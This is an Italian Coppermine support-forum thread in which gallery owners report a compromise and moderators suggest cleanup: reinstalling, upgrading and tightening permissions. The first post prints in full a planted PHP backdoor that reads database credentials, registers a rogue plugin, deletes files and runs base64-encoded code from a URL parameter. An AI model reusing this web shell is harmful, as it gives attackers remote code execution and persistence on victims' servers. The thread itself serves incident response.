Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Possibile attacco alla gallery!  (Read 8649 times)

0 Members and 1 Guest are viewing this topic.

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Possibile attacco alla gallery!
« on: February 21, 2009, 06:15:39 pm »

Un saluto a tutta la community, scrivo questo post per avere chiarimenti su di un fatto che mi è accaduto poco tempo fa. Stavo caricando via ftp (uso Filezilla) alcune immagini, quando nella cartella "Album" trovo un file mai visto prima, con il nome "eca620cc3c082634e38a3ba890993fc0" che ho ovviamente rimosso dal server. Secondo voi mi devo preoccupare? Per ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker. Di seguito vi posto il codice php del file:

Code: [Select]
<?
$hash="eca620cc3c082634e38a3ba890993fc0";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="eca620cc3c082634e38a3ba890993fc0";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("eca620cc3c082634e38a3ba890993fc0", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>

Vi ringrazio in anticipo!
Logged

twist

  • Moderator
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 360
    • 100iso.eu
Re: Possibile attacco alla gallery!
« Reply #1 on: February 21, 2009, 08:44:32 pm »

Se la galleria e' stata infettata rimuovere il singolo file non serve.

L'unica cosa che ti puo' mettere al sicuro e' questa:
rinomina la root dove risiede coppermine, cosi' eviti altri eventuali danni e reinstalla da capo l'ultima versione.
Logged

Davide Renda

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1427
  • aka "Lontano"
    • www.daviderenda.eu
Re: Possibile attacco alla gallery!
« Reply #2 on: February 21, 2009, 11:03:15 pm »

Anzitutto quale versione utilizzi? Alcune possibili falle di sicurezza sono state recentemente scoperte e "colmate", l'ultima versione è la 1.4.20

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Possibile attacco alla gallery!
« Reply #3 on: February 22, 2009, 07:58:54 am »

Vi ringrazio per avermi risposto. La gallery è aggiornata all'ultima versione 1.4.20. Quindi come mi dovrei comportare? Non c'è un altro modo senza dover cambiare la root della gallery?  ???
Logged

Davide Renda

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1427
  • aka "Lontano"
    • www.daviderenda.eu
Re: Possibile attacco alla gallery!
« Reply #4 on: February 22, 2009, 11:19:26 am »

Hai possibilità di leggere il log del tuo sito? Prima di gridare al lupo (o, meglio, all'hacker!) sarebbe interessante poter capire quale sia stata l'attività sul sito. Continuo a pensare al file che hai trovato, come ad un temporaneo, magari un trasferimento andato male o qualcosa del genere.
Se hai la possibilità di avere il log faccelo avere: se di hacking si tratta (o tentativo di hacking) è importante, per il bene di tutte le gallerie, capire cosa è successo e trovare soluzioni.

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Possibile attacco alla gallery!
« Reply #5 on: February 22, 2009, 11:33:53 am »

Il mio sito è hostato su Aruba, che sia un errore di trasferimento di Filezilla, non saprei. Per sicurezza ho aperto un ticket in assistenza chiedendo la modifica della password del mio database MySql e ho cancellato tutti i file della mia galleria (eccetto il config.inc.php e la cartella album) sostituendoli con quelli del pacchetto "Coppermine". Secondo voi ho fatto bene?

Per quanto riguarda invece la lettura del log non credo che Aruba lo permetta in quanto non sono riuscito a trovare questa funzione nel pannello di amministrazione.
Logged

Ludo

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 706
    • E+GiElle
Re: Possibile attacco alla gallery!
« Reply #6 on: February 22, 2009, 03:13:14 pm »

Per ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker.
Timori fondati, vedi qui un caso identico...e segui gli accorgimenti ivi suggeriti.
La falla è senz'altro precedente l'upgrade alla versione 1.4.20 (se hai avuto spirito da "hackerbuster" avrai senz'altro conservato il file, o preso nota della data 8) ), quindi IMHO con una disinstallazione e reinstallazione completa sei a posto. Raccomando anch'io di impostare i permessi della cartella /albums e relative a sottocartelle a 755 anzichè 777: Coppermine funziona ugualmente.
Logged

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Possibile attacco alla gallery!
« Reply #7 on: February 22, 2009, 04:20:09 pm »

Grazie Ludo! Purtroppo è come temevo.  :-[  Siccome la mia gallery conta quasi 14.000 file e non vorrei perdere tutto il lavoro svolto, volevo sapere se una reinstallazione mi cancellerebbe tutto, oppure c'è un modo meno "aggressivo" per risolvere? Grazie per tutto il tempo che avete perso ad aiutarmi.  :)
Logged

Ludo

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 706
    • E+GiElle
Re: Possibile attacco alla gallery!
« Reply #8 on: February 22, 2009, 04:27:07 pm »

La reinstallazione, come l'installazione, non riguarda la cartella /albums (salvo pulizia), ma solo i core files (più eventuali plugin e mod aggiornati).
Per facilitare la pulizia della cartella albums, puoi lanciare uno scandir() ricorsivo che cerchi ed elimini i file con estensione diversa da quelli immagine e video...
Logged

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Possibile attacco alla gallery!
« Reply #9 on: February 22, 2009, 04:32:31 pm »

io ho già eliminato tutti i file di coppermine eccetto la cartella album e config.inc.php con quelli "puliti" presenti nell'archivio del pacchetto di installazione. E' questo che intendevi dire? Scusami ma è la prima volta che mi accade una cosa del genere.
Lo scandir() come si esegue?
Logged

Ludo

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 706
    • E+GiElle
Re: Possibile attacco alla gallery!
« Reply #10 on: February 23, 2009, 09:14:06 am »

Sì, intendevo esattamente quello, avendo l'accortezza di eliminare prima tutte le cartelle della vecchia installazione e poi ricaricarle interamente, così da rimuovere eventuali file ambigui.
Per scandir intendevo uno script in PHP che scorra le cartelle a partire da /albums e controlli la presenza di files non previsti, non essendo qui possibile eliminare la cartella.
Logged

XTChrys

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Possibile attacco alla gallery!
« Reply #11 on: February 23, 2009, 02:44:09 pm »

Ok, grazie mille per l'aiuto, siete stati gentilissimi ora posso stare tranquillo.  :)
Logged

panu

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Possibile attacco alla gallery!
« Reply #12 on: March 24, 2009, 12:35:34 am »

Ciao a tutti!!
Scusate se mi intrometto ma , per mia imperdonabile negligenza non avendo aggiornato coppermine da circa un anno sono caduto in un sicuro attacco .... sono "sparite tutte le foto", nel senso che sono per fortuna ancora presenti nelle directory, che ho provveduto a salvare completamente, ma sono saltati tutti i link....
Nella cartella albums ho un file 03d667ca.php e uno 9.php ......
Cosa è successo?
Immagino non sia sufficente aggiornare coppermine ora..... mi rimane la cancellazione totale e reinstallazione o c'è un metodo piu indolore???
Se volete dare un'occhiata la gallery menomata la trovate su www.imbriaeghidozena.com/foto/index.php .....
Vi ringrazio anticipatamente ....

Ciao a tutti
Logged

panu

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Possibile attacco alla gallery!
« Reply #13 on: March 25, 2009, 12:22:19 am »

Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....
Logged

Davide Renda

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1427
  • aka "Lontano"
    • www.daviderenda.eu
Re: Possibile attacco alla gallery!
« Reply #14 on: March 26, 2009, 09:34:34 pm »

Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....
Se spieghi come/cosa hai fatto, potrebbe essere d'aiuto anche ad altri è lo spirito del forum ;-)

panu

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Possibile attacco alla gallery!
« Reply #15 on: March 29, 2009, 03:26:57 pm »

Si chiedo scusa....
non ho fatto nulla di che... dopo aver rimosso 1 file che mi era apparso nella cartella album ho semplicemente guardato che file fossero stati modificati il giorno dell'attacco e li ho ripresi da un backup di qualche tempo fa.... ora non sono a casa, quando apro il mio pc scrivo i nomi dei file che erano stati attaccati...

Ciao a tutti..
Logged
Pages: [1]   Go Up
 

Page created in 0.043 seconds with 18 queries.